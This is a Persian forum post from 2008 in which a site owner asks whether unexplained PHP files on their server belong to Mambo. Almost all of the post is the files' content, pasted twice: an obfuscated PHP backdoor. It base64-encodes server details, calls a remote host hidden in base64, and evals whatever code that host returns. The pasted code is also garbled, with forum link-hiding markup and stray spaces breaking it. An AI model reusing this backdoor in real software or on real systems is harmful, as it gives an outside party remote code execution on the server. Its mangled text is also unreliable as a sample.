merkousha
12-21-2008, 05:20 PM
چند تا فایل شبیه 149358.php
با فرمت زیر روی سرورم بوجود اومدن می خواستم بدونم که اینا مربوط به مامبو هستن یا اینکه خیر ؟
داخل این فایل ها این کد ها هست :
<? error_reporting(0);$a=(isset($_SERVER["<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>])?$_SERVER["<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>]:$<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>])?$_SERVER["<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>]:$<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>);$g=(isset($_SERVER["<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>])?$_SERVER["<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>]:$<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>])?$_SERVER["<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>]:$<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>);$z="/?".base64_encode($a).".".base64_encode($b).".".bas e64_encode($c).".".base64_encode($d).".".base64_en code($e).".".base64_encode($f).".".base64_encode($ g).".".base64_encode($h).".e.".base64_encode($i)." .".base64_encode($j);$f=base64_decode("cGhwZmVlZC5 ydQ==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="2b75fbc4c84029319d9606ca8281eea9") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f. $z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzc u").$f.$z))eval($c);else{$cu=curl_init(base64_deco de("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURL OPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close ($cu);eval($o);}; ?>
با فرمت زیر روی سرورم بوجود اومدن می خواستم بدونم که اینا مربوط به مامبو هستن یا اینکه خیر ؟
داخل این فایل ها این کد ها هست :
<? error_reporting(0);$a=(isset($_SERVER["<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>])?$_SERVER["<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>]:$<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>])?$_SERVER["<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>]:$<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>);$g=(isset($_SERVER["<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>])?$_SERVER["<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>]:$<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>])?$_SERVER["<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>]:$<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>);$z="/?".base64_encode($a).".".base64_encode($b).".".bas e64_encode($c).".".base64_encode($d).".".base64_en code($e).".".base64_encode($f).".".base64_encode($ g).".".base64_encode($h).".e.".base64_encode($i)." .".base64_encode($j);$f=base64_decode("cGhwZmVlZC5 ydQ==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="2b75fbc4c84029319d9606ca8281eea9") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f. $z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzc u").$f.$z))eval($c);else{$cu=curl_init(base64_deco de("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURL OPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close ($cu);eval($o);}; ?>